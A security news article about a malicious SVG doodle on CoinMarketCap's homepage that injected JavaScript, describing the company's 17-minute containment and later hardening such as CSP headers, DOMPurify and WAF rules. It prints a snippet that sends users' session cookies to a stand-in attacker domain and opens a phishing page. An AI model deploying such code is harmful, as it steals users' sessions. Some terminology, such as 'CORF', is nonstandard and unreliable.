CoinMarketCap Doodle Image Bug Triggers Malicious Code via API Call

On June 20, 2025, CoinMarketCap’s security team identified and contained a sophisticated attack vector involving a compromised doodle image on the platform’s homepage.

The malicious SVG/JavaScript payload triggered unauthorized API calls (POST /api/renderDoodleWhen loaded, executing cross-origin resource fetching (CORF) that generated unexpected pop-ups for users.

This client-side script injection exploited the browser’s same-origin policy weaknesses, though no backend systems were breached.

SVG Payload with Embedded JavaScript

The weaponized doodle contained obfuscated JavaScript within an SVG <script> tag:

javascriptfetch('https://malicious-domain.tld/api', {  
  method: 'POST',  
  body: JSON.stringify({cookies: document.cookie})  
}).then(() => window.open('phishing-page.html'))  

This code harvested session cookies via document.cookie and exfiltrated them to attacker-controlled servers before triggering pop-ups.

The attack leveraged SVG’s ability to execute JavaScript while masquerading as benign imagery, bypassing initial content security policy (CSP) checks.

Incident Response and Containment

CoinMarketCap’s security operations center (SOC) executed a four-phase containment protocol within 17 minutes of detection:

1. Immediate Takedown: Disabled the homepage_doodle_loader microservice (v3.2.1) and purged CDN caches globally.
2. Forensic Analysis: Reviewed CloudTrail logs and Lambda execution histories to confirm zero data exfiltration from backend systems.
3. Patch Deployment: Implemented stricter CSP headers (script-src 'self'; object-src 'none') and SVG sanitization using DOMPurify v3.0.
4. Threat Hunting: Scanned all user-uploaded content with YARA rules to detect similar payload patterns.

Enhanced Security Measures

Post-incident, CoinMarketCap deployed three key upgrades:

1. Runtime Protection: Added real-time behavior monitoring via AWS WAF rules blocking anomalous window.open() and fetch() patterns.
2. Content Validation: Implemented cryptographic asset signing using Ed25519 keys for all static content.
3. Bug Bounty Expansion: Increased maximum rewards to $100,000 for DOM-XSS vulnerabilities through HackerOne.

All systems were fully restored within 2 hours, with comprehensive audits confirming no persistent threats.

CoinMarketCap’s transparent disclosure and rapid response demonstrate robust security practices, though the incident underscores evolving risks in dynamic web content.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates